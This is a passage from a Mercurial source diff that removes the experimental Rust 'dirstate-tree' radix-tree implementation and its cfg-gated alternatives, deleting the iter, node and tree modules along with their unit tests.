dirstate_map; -#[cfg(feature = "dirstate-tree")] -pub mod dirstate_tree; pub mod parsers; pub mod status; @@ -52,15 +50,9 @@ /// merge. pub const SIZE_FROM_OTHER_PARENT: i32 = -2; -#[cfg(not(feature = "dirstate-tree"))] pub type StateMap = FastHashMap<HgPathBuf, DirstateEntry>; -#[cfg(not(feature = "dirstate-tree"))] pub type StateMapIter<'a> = hash_map::Iter<'a, HgPathBuf, DirstateEntry>; -#[cfg(feature = "dirstate-tree")] -pub type StateMap = dirstate_tree::tree::Tree; -#[cfg(feature = "dirstate-tree")] -pub type StateMapIter<'a> = dirstate_tree::iter::Iter<'a>; pub type CopyMap = FastHashMap<HgPathBuf, HgPathBuf>; pub type CopyMapIter<'a> = hash_map::Iter<'a, HgPathBuf, HgPathBuf>; diff --git a/rust/hg-core/src/dirstate/dirs_multiset.rs b/rust/hg-core/src/dirstate/dirs_multiset.rs --- a/rust/hg-core/src/dirstate/dirs_multiset.rs +++ b/rust/hg-core/src/dirstate/dirs_multiset.rs @@ -30,7 +30,6 @@ /// Initializes the multiset from a dirstate. /// /// If `skip_state` is provided, skips dirstate entries with equal state. - #[cfg(not(feature = "dirstate-tree"))] pub fn from_dirstate( dirstate: &StateMap, skip_state: Option<EntryState>, @@ -51,30 +50,6 @@ Ok(multiset) } - /// Initializes the multiset from a dirstate. - /// - /// If `skip_state` is provided, skips dirstate entries with equal state. - #[cfg(feature = "dirstate-tree")] - pub fn from_dirstate( - dirstate: &StateMap, - skip_state: Option<EntryState>, - ) -> Result<Self, DirstateMapError> { - let mut multiset = DirsMultiset { - inner: FastHashMap::default(), - }; - for (filename, DirstateEntry { state, .. }) in dirstate.iter() { - // This `if` is optimized out of the loop - if let Some(skip) = skip_state { - if skip != state { - multiset.add_path(filename)?; - } - } else { - multiset.add_path(filename)?; - } - } - - Ok(multiset) - } /// Initializes the multiset from a manifest. pub fn from_manifest( diff --git a/rust/hg-core/src/dirstate/dirstate_map.rs b/rust/hg-core/src/dirstate/dirstate_map.rs --- a/rust/hg-core/src/dirstate/dirstate_map.rs +++ b/rust/hg-core/src/dirstate/dirstate_map.rs @@ -254,7 +254,6 @@ ) } - #[cfg(not(feature = "dirstate-tree"))] pub fn set_non_normal_other_parent_entries(&mut self, force: bool) { if !force && self.non_normal_set.is_some() @@ -283,34 +282,6 @@ self.non_normal_set = Some(non_normal); self.other_parent_set = Some(other_parent); } - #[cfg(feature = "dirstate-tree")] - pub fn set_non_normal_other_parent_entries(&mut self, force: bool) { - if !force - && self.non_normal_set.is_some() - && self.other_parent_set.is_some() - { - return; - } - let mut non_normal = HashSet::new(); - let mut other_parent = HashSet::new(); - - for ( - filename, - DirstateEntry { - state, size, mtime, .. - }, - ) in self.state_map.iter() - { - if state != EntryState::Normal || mtime == MTIME_UNSET { - non_normal.insert(filename.to_owned()); - } - if state == EntryState::Normal && size == SIZE_FROM_OTHER_PARENT { - other_parent.insert(filename.to_owned()); - } - } - self.non_normal_set = Some(non_normal); - self.other_parent_set = Some(other_parent); - } /// Both of these setters and their uses appear to be the simplest way to /// emulate a Python lazy property, but it is ugly and unidiomatic. @@ -426,7 +397,6 @@ self.set_non_normal_other_parent_entries(true); Ok(packed) } - #[cfg(not(feature = "dirstate-tree"))] pub fn build_file_fold_map(&mut self) -> &FileFoldMap { if let Some(ref file_fold_map) = self.file_fold_map { return file_fold_map; @@ -442,22 +412,6 @@ self.file_fold_map = Some(new_file_fold_map); self.file_fold_map.as_ref().unwrap() } - #[cfg(feature = "dirstate-tree")] - pub fn build_file_fold_map(&mut self) -> &FileFoldMap { - if let Some(ref file_fold_map) = self.file_fold_map { - return file_fold_map; - } - let mut new_file_fold_map = FileFoldMap::default(); - - for (filename, DirstateEntry { state, .. }) in self.state_map.iter() { - if state != EntryState::Removed { - new_file_fold_map - .insert(normalize_case(&filename), filename.to_owned()); - } - } - self.file_fold_map = Some(new_file_fold_map); - self.file_fold_map.as_ref().unwrap() - } } #[cfg(test)] diff --git a/rust/hg-core/src/dirstate/dirstate_tree.rs b/rust/hg-core/src/dirstate/dirstate_tree.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree.rs +++ /dev/null @@ -1,14 +0,0 @@ -// dirstate_tree.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -//! Special-case radix tree that matches a filesystem hierarchy for use in the -//! dirstate. -//! It has not been optimized at all yet. - -pub mod iter; -pub mod node; -pub mod tree; diff --git a/rust/hg-core/src/dirstate/dirstate_tree/iter.rs b/rust/hg-core/src/dirstate/dirstate_tree/iter.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree/iter.rs +++ /dev/null @@ -1,392 +0,0 @@ -// iter.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -use super::node::{Node, NodeKind}; -use super::tree::Tree; -use crate::dirstate::dirstate_tree::node::Directory; -use crate::dirstate::status::Dispatch; -use crate::utils::hg_path::{hg_path_to_path_buf, HgPath, HgPathBuf}; -use crate::DirstateEntry; -use std::borrow::Cow; -use std::collections::VecDeque; -use std::iter::{FromIterator, FusedIterator}; -use std::path::PathBuf; - -impl FromIterator<(HgPathBuf, DirstateEntry)> for Tree { - fn from_iter<T: IntoIterator<Item = (HgPathBuf, DirstateEntry)>>( - iter: T, - ) -> Self { - let mut tree = Self::new(); - for (path, entry) in iter { - tree.insert(path, entry); - } - tree - } -} - -/// Iterator of all entries in the dirstate tree. -/// -/// It has no particular ordering. -pub struct Iter<'a> { - to_visit: VecDeque<(Cow<'a, [u8]>, &'a Node)>, -} - -impl<'a> Iter<'a> { - pub fn new(node: &'a Node) -> Iter<'a> { - let mut to_visit = VecDeque::new(); - to_visit.push_back((Cow::Borrowed(&b""[..]), node)); - Self { to_visit } - } -} - -impl<'a> Iterator for Iter<'a> { - type Item = (HgPathBuf, DirstateEntry); - - fn next(&mut self) -> Option<Self::Item> { - while let Some((base_path, node)) = self.to_visit.pop_front() { - match &node.kind { - NodeKind::Directory(dir) => { - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - if let Some(file) = &dir.was_file { - return Some(( - HgPathBuf::from_bytes(&base_path), - file.entry, - )); - } - } - NodeKind::File(file) => { - if let Some(dir) = &file.was_directory { - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - } - return Some(( - HgPathBuf::from_bytes(&base_path), - file.entry, - )); - } - } - } - None - } -} - -impl<'a> FusedIterator for Iter<'a> {} - -/// Iterator of all entries in the dirstate tree, with a special filesystem -/// handling for the directories containing said entries. -/// -/// It checks every directory on-disk to see if it has become a symlink, to -/// prevent a potential security issue. -/// Using this information, it may dispatch `status` information early: it -/// returns canonical paths along with `Shortcut`s, which are either a -/// `DirstateEntry` or a `Dispatch`, if the fate of said path has already been -/// determined. -/// -/// Like `Iter`, it has no particular ordering. -pub struct FsIter<'a> { - root_dir: PathBuf, - to_visit: VecDeque<(Cow<'a, [u8]>, &'a Node)>, - shortcuts: VecDeque<(HgPathBuf, StatusShortcut)>, -} - -impl<'a> FsIter<'a> { - pub fn new(node: &'a Node, root_dir: PathBuf) -> FsIter<'a> { - let mut to_visit = VecDeque::new(); - to_visit.push_back((Cow::Borrowed(&b""[..]), node)); - Self { - root_dir, - to_visit, - shortcuts: Default::default(), - } - } - - /// Mercurial tracks symlinks but *not* what they point to. - /// If a directory is moved and symlinked: - /// - /// ```bash - /// $ mkdir foo - /// $ touch foo/a - /// $ # commit... - /// $ mv foo bar - /// $ ln -s bar foo - /// ``` - /// We need to dispatch the new symlink as `Unknown` and all the - /// descendents of the directory it replace as `Deleted`. - fn dispatch_symlinked_directory( - &mut self, - path: impl AsRef<HgPath>, - node: &Node, - ) { - let path = path.as_ref(); - self.shortcuts.push_back(( - path.to_owned(), - StatusShortcut::Dispatch(Dispatch::Unknown), - )); - for (file, _) in node.iter() { - self.shortcuts.push_back(( - path.join(&file), - StatusShortcut::Dispatch(Dispatch::Deleted), - )); - } - } - - /// Returns `true` if the canonical `path` of a directory corresponds to a - /// symlink on disk. It means it was moved and symlinked after the last - /// dirstate update. - /// - /// # Special cases - /// - /// Returns `false` for the repository root. - /// Returns `false` on io error, error handling is outside of the iterator. - fn directory_became_symlink(&mut self, path: &HgPath) -> bool { - if path.is_empty() { - return false; - } - let filename_as_path = match hg_path_to_path_buf(&path) { - Ok(p) => p, - _ => return false, - }; - let meta = self.root_dir.join(filename_as_path).symlink_metadata(); - match meta { - Ok(ref m) if m.file_type().is_symlink() => true, - _ => false, - } - } -} - -/// Returned by `FsIter`, since the `Dispatch` of any given entry may already -/// be determined during the iteration. This is necessary for performance -/// reasons, since hierarchical information is needed to `Dispatch` an entire -/// subtree efficiently. -#[derive(Debug, Copy, Clone)] -pub enum StatusShortcut { - /// A entry in the dirstate for further inspection - Entry(DirstateEntry), - /// The result of the status of the corresponding file - Dispatch(Dispatch), -} - -impl<'a> Iterator for FsIter<'a> { - type Item = (HgPathBuf, StatusShortcut); - - fn next(&mut self) -> Option<Self::Item> { - // If any paths have already been `Dispatch`-ed, return them - if let Some(res) = self.shortcuts.pop_front() { - return Some(res); - } - - while let Some((base_path, node)) = self.to_visit.pop_front() { - match &node.kind { - NodeKind::Directory(dir) => { - let canonical_path = HgPath::new(&base_path); - if self.directory_became_symlink(canonical_path) { - // Potential security issue, don't do a normal - // traversal, force the results. - self.dispatch_symlinked_directory( - canonical_path, - &node, - ); - continue; - } - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - if let Some(file) = &dir.was_file { - return Some(( - HgPathBuf::from_bytes(&base_path), - StatusShortcut::Entry(file.entry), - )); - } - } - NodeKind::File(file) => { - if let Some(dir) = &file.was_directory { - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - } - return Some(( - HgPathBuf::from_bytes(&base_path), - StatusShortcut::Entry(file.entry), - )); - } - } - } - - None - } -} - -impl<'a> FusedIterator for FsIter<'a> {} - -fn join_path<'a, 'b>(path: &'a [u8], other: &'b [u8]) -> Cow<'b, [u8]> { - if path.is_empty() { - other.into() - } else { - [path, &b"/"[..], other].concat().into() - } -} - -/// Adds all children of a given directory `dir` to the visit queue `to_visit` -/// prefixed by a `base_path`. -fn add_children_to_visit<'a>( - to_visit: &mut VecDeque<(Cow<'a, [u8]>, &'a Node)>, - base_path: &[u8], - dir: &'a Directory, -) { - to_visit.extend(dir.children.iter().map(|(path, child)| { - let full_path = join_path(&base_path, &path); - (full_path, child) - })); -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::utils::hg_path::HgPath; - use crate::{EntryState, FastHashMap}; - use std::collections::HashSet; - - #[test] - fn test_iteration() { - let mut tree = Tree::new(); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/bar"), - DirstateEntry { - state: EntryState::Merged, - mode: 41, - mtime: 42, - size: 43, - } - ), - None - ); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo2"), - DirstateEntry { - state: EntryState::Merged, - mode: 40, - mtime: 41, - size: 42, - } - ), - None - ); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/baz"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/bap/nested"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - assert_eq!(tree.len(), 4); - - let results: HashSet<_> = - tree.iter().map(|(c, _)| c.to_owned()).collect(); - dbg!(&results); - assert!(results.contains(HgPath::new(b"foo2"))); - assert!(results.contains(HgPath::new(b"foo/bar"))); - assert!(results.contains(HgPath::new(b"foo/baz"))); - assert!(results.contains(HgPath::new(b"foo/bap/nested"))); - - let mut iter = tree.iter(); - assert!(iter.next().is_some()); - assert!(iter.next().is_some()); - assert!(iter.next().is_some()); - assert!(iter.next().is_some()); - assert_eq!(None, iter.next()); - assert_eq!(None, iter.next()); - drop(iter); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/bap/nested/a"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - let results: FastHashMap<_, _> = tree.iter().collect(); - assert!(results.contains_key(HgPath::new(b"foo2"))); - assert!(results.contains_key(HgPath::new(b"foo/bar"))); - assert!(results.contains_key(HgPath::new(b"foo/baz"))); - // Is a dir but `was_file`, so it's listed as a removed file - assert!(results.contains_key(HgPath::new(b"foo/bap/nested"))); - assert!(results.contains_key(HgPath::new(b"foo/bap/nested/a"))); - - // insert removed file (now directory) after nested file - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"a/a"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - // `insert` returns `None` for a directory - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"a"), - DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - let results: FastHashMap<_, _> = tree.iter().collect(); - assert!(results.contains_key(HgPath::new(b"a"))); - assert!(results.contains_key(HgPath::new(b"a/a"))); - } -} diff --git a/rust/hg-core/src/dirstate/dirstate_tree/node.rs b/rust/hg-core/src/dirstate/dirstate_tree/node.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree/node.rs +++ /dev/null @@ -1,398 +0,0 @@ -// node.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -use super::iter::Iter; -use crate::utils::hg_path::HgPathBuf; -use crate::{DirstateEntry, EntryState, FastHashMap}; - -/// Represents a filesystem directory in the dirstate tree -#[derive(Debug, Default, Clone, PartialEq)] -pub struct Directory { - /// Contains the old file information if it existed between changesets. - /// Happens if a file `foo` is marked as removed, removed from the - /// filesystem then a directory `foo` is created and at least one of its - /// descendents is added to Mercurial. - pub(super) was_file: Option<Box<File>>, - pub(super) children: FastHashMap<Vec<u8>, Node>, -} - -/// Represents a filesystem file (or symlink) in the dirstate tree -#[derive(Debug, Clone, PartialEq)] -pub struct File { - /// Contains the old structure if it existed between changesets. - /// Happens all descendents of `foo` marked as removed and removed from - /// the filesystem, then a file `foo` is created and added to Mercurial. - pub(super) was_directory: Option<Box<Directory>>, - pub(super) entry: DirstateEntry, -} - -#[derive(Debug, Clone, PartialEq)] -pub enum NodeKind { - Directory(Directory), - File(File), -} - -#[derive(Debug, Default, Clone, PartialEq)] -pub struct Node { - pub kind: NodeKind, -} - -impl Default for NodeKind { - fn default() -> Self { - NodeKind::Directory(Default::default()) - } -} - -impl Node { - pub fn insert( - &mut self, - path: &[u8], - new_entry: DirstateEntry, - ) -> InsertResult { - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next().unwrap_or(b""); - let tail = split.next().unwrap_or(b""); - - // Are we're modifying the current file ? Is the the end of the path ? - let is_current_file = tail.is_empty() && head.is_empty(); - - // Potentially Replace the current file with a directory if it's marked - // as `Removed` - if !is_current_file { - if let NodeKind::File(file) = &mut self.kind { - if file.entry.state == EntryState::Removed { - self.kind = NodeKind::Directory(Directory { - was_file: Some(Box::from(file.clone())), - children: Default::default(), - }) - } - } - } - match &mut self.kind { - NodeKind::Directory(directory) => { - Node::insert_in_directory(directory, new_entry, head, tail) - } - NodeKind::File(file) => { - if is_current_file { - let new = Self { - kind: NodeKind::File(File { - entry: new_entry, - ..file.clone() - }), - }; - InsertResult { - did_insert: false, - old_entry: Some(std::mem::replace(self, new)), - } - } else { - match file.entry.state { - EntryState::Removed => { - unreachable!("Removed file turning into a directory was dealt with earlier") - } - _ => { - Node::insert_in_file( - file, new_entry, head, tail, - ) - } - } - } - } - } - } - - /// The current file still exists and is not marked as `Removed`. - /// Insert the entry in its `was_directory`. - fn insert_in_file( - file: &mut File, - new_entry: DirstateEntry, - head: &[u8], - tail: &[u8], - ) -> InsertResult { - if let Some(d) = &mut file.was_directory { - Node::insert_in_directory(d, new_entry, head, tail) - } else { - let mut dir = Directory { - was_file: None, - children: FastHashMap::default(), - }; - let res = - Node::insert_in_directory(&mut dir, new_entry, head, tail); - file.was_directory = Some(Box::new(dir)); - res - } - } - - /// Insert an entry in the subtree of `directory` - fn insert_in_directory( - directory: &mut Directory, - new_entry: DirstateEntry, - head: &[u8], - tail: &[u8], - ) -> InsertResult { - let mut res = InsertResult::default(); - - if let Some(node) = directory.children.get_mut(head) { - // Node exists - match &mut node.kind { - NodeKind::Directory(subdir) => { - if tail.is_empty() { - let becomes_file = Self { - kind: NodeKind::File(File { - was_directory: Some(Box::from(subdir.clone())), - entry: new_entry, - }), - }; - let old_entry = directory - .children - .insert(head.to_owned(), becomes_file); - return InsertResult { - did_insert: true, - old_entry, - }; - } else { - res = node.insert(tail, new_entry); - } - } - NodeKind::File(_) => { - res = node.insert(tail, new_entry); - } - } - } else if tail.is_empty() { - // File does not already exist - directory.children.insert( - head.to_owned(), - Self { - kind: NodeKind::File(File { - was_directory: None, - entry: new_entry, - }), - }, - ); - res.did_insert = true; - } else { - // Directory does not already exist - let mut nested = Self { - kind: NodeKind::Directory(Directory { - was_file: None, - children: Default::default(), - }), - }; - res = nested.insert(tail, new_entry); - directory.children.insert(head.to_owned(), nested); - } - res - } - - /// Removes an entry from the tree, returns a `RemoveResult`. - pub fn remove(&mut self, path: &[u8]) -> RemoveResult { - let empty_result = RemoveResult::default(); - if path.is_empty() { - return empty_result; - } - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next(); - let tail = split.next().unwrap_or(b""); - - let head = match head { - None => { - return empty_result; - } - Some(h) => h, - }; - if head == path { - match &mut self.kind { - NodeKind::Directory(d) => { - return Node::remove_from_directory(head, d); - } - NodeKind::File(f) => { - if let Some(d) = &mut f.was_directory { - let RemoveResult { old_entry, .. } = - Node::remove_from_directory(head, d); - return RemoveResult { - cleanup: false, - old_entry, - }; - } - } - } - empty_result - } else { - // Look into the dirs - match &mut self.kind { - NodeKind::Directory(d) => { - if let Some(child) = d.children.get_mut(head) { - let mut res = child.remove(tail); - if res.cleanup { - d.children.remove(head); - } - res.cleanup = - d.children.is_empty() && d.was_file.is_none(); - res - } else { - empty_result - } - } - NodeKind::File(f) => { - if let Some(d) = &mut f.was_directory { - if let Some(child) = d.children.get_mut(head) { - let RemoveResult { cleanup, old_entry } = - child.remove(tail); - if cleanup { - d.children.remove(head); - } - if d.children.is_empty() && d.was_file.is_none() { - f.was_directory = None; - } - - return RemoveResult { - cleanup: false, - old_entry, - }; - } - } - empty_result - } - } - } - } - - fn remove_from_directory(head: &[u8], d: &mut Directory) -> RemoveResult { - if let Some(node) = d.children.get_mut(head) { - return match &mut node.kind { - NodeKind::Directory(d) => { - if let Some(f) = &mut d.was_file { - let entry = f.entry; - d.was_file = None; - RemoveResult { - cleanup: false, - old_entry: Some(entry), - } - } else { - RemoveResult::default() - } - } - NodeKind::File(f) => { - let entry = f.entry; - let mut cleanup = false; - match &f.was_directory { - None => { - if d.children.len() == 1 { - cleanup = true; - } - d.children.remove(head); - } - Some(dir) => { - node.kind = NodeKind::Directory(*dir.clone()); - } - } - - RemoveResult { - cleanup, - old_entry: Some(entry), - } - } - }; - } - RemoveResult::default() - } - - pub fn get(&self, path: &[u8]) -> Option<&Node> { - if path.is_empty() { - return Some(&self); - } - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next(); - let tail = split.next().unwrap_or(b""); - - let head = match head { - None => { - return Some(&self); - } - Some(h) => h, - }; - match &self.kind { - NodeKind::Directory(d) => { - if let Some(child) = d.children.get(head) { - return child.get(tail); - } - } - NodeKind::File(f) => { - if let Some(d) = &f.was_directory { - if let Some(child) = d.children.get(head) { - return child.get(tail); - } - } - } - } - - None - } - - pub fn get_mut(&mut self, path: &[u8]) -> Option<&mut NodeKind> { - if path.is_empty() { - return Some(&mut self.kind); - } - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next(); - let tail = split.next().unwrap_or(b""); - - let head = match head { - None => { - return Some(&mut self.kind); - } - Some(h) => h, - }; - match &mut self.kind { - NodeKind::Directory(d) => { - if let Some(child) = d.children.get_mut(head) { - return child.get_mut(tail); - } - } - NodeKind::File(f) => { - if let Some(d) = &mut f.was_directory { - if let Some(child) = d.children.get_mut(head) { - return child.get_mut(tail); - } - } - } - } - - None - } - - pub fn iter(&self) -> Iter { - Iter::new(self) - } -} - -/// Information returned to the caller of an `insert` operation for integrity. -#[derive(Debug, Default)] -pub struct InsertResult { - /// Whether the insertion resulted in an actual insertion and not an - /// update - pub(super) did_insert: bool, - /// The entry that was replaced, if it exists - pub(super) old_entry: Option<Node>, -} - -/// Information returned to the caller of a `remove` operation integrity. -#[derive(Debug, Default)] -pub struct RemoveResult { - /// If the caller needs to remove the current node - pub(super) cleanup: bool, - /// The entry that was replaced, if it exists - pub(super) old_entry: Option<DirstateEntry>, -} - -impl<'a> IntoIterator for &'a Node { - type Item = (HgPathBuf, DirstateEntry); - type IntoIter = Iter<'a>; - - fn into_iter(self) -> Self::IntoIter { - self.iter() - } -} diff --git a/rust/hg-core/src/dirstate/dirstate_tree/tree.rs b/rust/hg-core/src/dirstate/dirstate_tree/tree.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree/tree.rs +++ /dev/null @@ -1,682 +0,0 @@ -// tree.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -use super::iter::Iter; -use super::node::{Directory, Node, NodeKind}; -use crate::dirstate::dirstate_tree::iter::FsIter; -use crate::dirstate::dirstate_tree::node::{InsertResult, RemoveResult}; -use crate::utils::hg_path::{HgPath, HgPathBuf}; -use crate::DirstateEntry; -use std::path::PathBuf; - -/// A specialized tree to represent the Mercurial dirstate. -/// -/// # Advantages over a flat structure -/// -/// The dirstate is inherently hierarchical, since it's a representation of the -/// file structure of the project. The current dirstate format is flat, and -/// while that affords us potentially great (unordered) iteration speeds, the -/// need to retrieve a given path is great enough that you need some kind of -/// hashmap or tree in a lot of cases anyway. -/// -/// Going with a tree allows us to be smarter: -/// - Skipping an ignored directory means we don't visit its entire subtree -/// - Security auditing does not need to reconstruct paths backwards to check -/// for symlinked directories, this can be done during the iteration in a -/// very efficient fashion -/// - We don't need to build the directory information in another struct, -/// simplifying the code a lot, reducing the memory footprint and -/// potentially going faster depending on the implementation. -/// - We can use it to store a (platform-dependent) caching mechanism [1] -/// - And probably other types of optimizations. -/// -/// Only the first two items in this list are implemented as of this commit. -/// -/// [1]: https://www.mercurial-scm.org/wiki/DirsCachePlan -/// -/// -/// # Structure -/// -/// It's a prefix (radix) tree with no fixed arity, with a granularity of a -/// folder, allowing it to mimic a filesystem hierarchy: -/// -/// ```text -/// foo/bar -/// foo/baz -/// test -/// ``` -/// Will be represented (simplified) by: -/// -/// ```text -/// Directory(root): -/// - File("test") -/// - Directory("foo"): -/// - File("bar") -/// - File("baz") -/// ``` -/// -/// Moreover, it is special-cased for storing the dirstate and as such handles -/// cases that a simple `HashMap` would handle, but while preserving the -/// hierarchy. -/// For example: -/// -/// ```shell -/// $ touch foo -/// $ hg add foo -/// $ hg commit -m "foo" -/// $ hg remove foo -/// $ rm foo -/// $ mkdir foo -/// $ touch foo/a -/// $ hg add foo/a -/// $ hg status -/// R foo -/// A foo/a -/// ``` -/// To represent this in a tree, one needs to keep track of whether any given -/// file was a directory and whether any given directory was a file at the last -/// dirstate update. This tree stores that information, but only in the right -/// circumstances by respecting the high-level rules that prevent nonsensical -/// structures to exist: -/// - a file can only be added as a child of another file if the latter is -/// marked as `Removed` -/// - a file cannot replace a folder unless all its descendents are removed -/// -/// This second rule is not checked by the tree for performance reasons, and -/// because high-level logic already prevents that state from happening. -/// -/// # Ordering -/// -/// It makes no guarantee of ordering for now. -#[derive(Debug, Default, Clone, PartialEq)] -pub struct Tree { - pub root: Node, - files_count: usize, -} - -impl Tree { - pub fn new() -> Self { - Self { - root: Node { - kind: NodeKind::Directory(Directory { - was_file: None, - children: Default::default(), - }), - }, - files_count: 0, - } - } - - /// How many files (not directories) are stored in the tree, including ones - /// marked as `Removed`. - pub fn len(&self) -> usize { - self.files_count - } - - pub fn is_empty(&self) -> bool { - self.len() == 0 - } - - /// Inserts a file in the tree and returns the previous entry if any. - pub fn insert( - &mut self, - path: impl AsRef<HgPath>, - kind: DirstateEntry, - ) -> Option<DirstateEntry> { - let old = self.insert_node(path, kind); - match old?.kind { - NodeKind::Directory(_) => None, - NodeKind::File(f) => Some(f.entry), - } - } - - /// Low-level insertion method that returns the previous node (directories - /// included). - fn insert_node( - &mut self, - path: impl AsRef<HgPath>, - kind: DirstateEntry, - ) -> Option<Node> { - let InsertResult { - did_insert, - old_entry, - } = self.root.insert(path.as_ref().as_bytes(), kind); - self.files_count += if did_insert { 1 } else { 0 }; - old_entry - } - - /// Returns a reference to a node if it exists. - pub fn get_node(&self, path: impl AsRef<HgPath>) -> Option<&Node> { - self.root.get(path.as_ref().as_bytes()) - } - - /// Returns a reference to the entry corresponding to `path` if it exists. - pub fn get(&self, path: impl AsRef<HgPath>) -> Option<&DirstateEntry> { - if let Some(node) = self.get_node(&path) { - return match &node.kind { - NodeKind::Directory(d) => { - d.was_file.as_ref().map(|f| &f.entry) - } - NodeKind::File(f) => Some(&f.entry), - }; - } - None - } - - /// Returns `true` if an entry is found for the given `path`. - pub fn contains_key(&self, path: impl AsRef<HgPath>) -> bool { - self.get(path).is_some() - } - - /// Returns a mutable reference to the entry corresponding to `path` if it - /// exists. - pub fn get_mut( - &mut self, - path: impl AsRef<HgPath>, - ) -> Option<&mut DirstateEntry> { - if let Some(kind) = self.root.get_mut(path.as_ref().as_bytes()) { - return match kind { - NodeKind::Directory(d) => { - d.was_file.as_mut().map(|f| &mut f.entry) - } - NodeKind::File(f) => Some(&mut f.entry), - }; - } - None - } - - /// Returns an iterator over the paths and corresponding entries in the - /// tree. - pub fn iter(&self) -> Iter { - Iter::new(&self.root) - } - - /// Returns an iterator of all entries in the tree, with a special - /// filesystem handling for the directories containing said entries. See - /// the documentation of `FsIter` for more. - pub fn fs_iter(&self, root_dir: PathBuf) -> FsIter { - FsIter::new(&self.root, root_dir) - } - - /// Remove the entry at `path` and returns it, if it exists. - pub fn remove( - &mut self, - path: impl AsRef<HgPath>, - ) -> Option<DirstateEntry> { - let RemoveResult { old_entry, .. } = - self.root.remove(path.as_ref().as_bytes()); - self.files_count = self - .files_count - .checked_sub(if old_entry.is_some() { 1 } else { 0 }) - .expect("removed too many files"); - old_entry - } -} - -impl<P: AsRef<HgPath>> Extend<(P, DirstateEntry)> for Tree { - fn extend<T: IntoIterator<Item = (P, DirstateEntry)>>(&mut self, iter: T) { - for (path, entry) in iter { - self.insert(path, entry); - } - } -} - -impl<'a> IntoIterator for &'a Tree { - type Item = (HgPathBuf, DirstateEntry); - type IntoIter = Iter<'a>; - - fn into_iter(self) -> Self::IntoIter { - self.iter() - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::dirstate::dirstate_tree::node::File; - use crate::{EntryState, FastHashMap}; - use pretty_assertions::assert_eq; - - impl Node { - /// Shortcut for getting children of a node in tests. - fn children(&self) -> Option<&FastHashMap<Vec<u8>, Node>> { - match &self.kind { - NodeKind::Directory(d) => Some(&d.children), - NodeKind::File(_) => None, - } - } - } - - #[test] - fn test_dirstate_tree() { - let mut tree = Tree::new(); - - assert_eq!( - tree.insert_node( - HgPath::new(b"we/p"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0 - } - ), - None - ); - dbg!(&tree); - assert!(tree.get_node(HgPath::new(b"we")).is_some()); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 41, - mtime: 42, - size: 43, - }; - assert_eq!(tree.insert_node(HgPath::new(b"foo/bar"), entry), None); - assert_eq!( - tree.get_node(HgPath::new(b"foo/bar")), - Some(&Node { - kind: NodeKind::File(File { - was_directory: None, - entry - }) - }) - ); - // We didn't override the first entry we made - assert!(tree.get_node(HgPath::new(b"we")).is_some(),); - // Inserting the same key again - assert_eq!( - tree.insert_node(HgPath::new(b"foo/bar"), entry), - Some(Node { - kind: NodeKind::File(File { - was_directory: None, - entry - }), - }) - ); - // Inserting the two levels deep - assert_eq!(tree.insert_node(HgPath::new(b"foo/bar/baz"), entry), None); - // Getting a file "inside a file" should return `None` - assert_eq!(tree.get_node(HgPath::new(b"foo/bar/baz/bap"),), None); - - assert_eq!( - tree.insert_node(HgPath::new(b"wasdir/subfile"), entry), - None, - ); - let removed_entry = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - }; - assert!(tree - .insert_node(HgPath::new(b"wasdir"), removed_entry) - .is_some()); - - assert_eq!( - tree.get_node(HgPath::new(b"wasdir")), - Some(&Node { - kind: NodeKind::File(File { - was_directory: Some(Box::new(Directory { - was_file: None, - children: [( - b"subfile".to_vec(), - Node { - kind: NodeKind::File(File { - was_directory: None, - entry, - }) - } - )] - .to_vec() - .into_iter() - .collect() - })), - entry: removed_entry - }) - }) - ); - - assert!(tree.get(HgPath::new(b"wasdir/subfile")).is_some()) - } - - #[test] - fn test_insert_removed() { - let mut tree = Tree::new(); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - let removed_entry = DirstateEntry { - state: EntryState::Removed, - mode: 10, - mtime: 20, - size: 30, - }; - assert_eq!(tree.insert_node(HgPath::new(b"foo"), entry), None); - assert_eq!( - 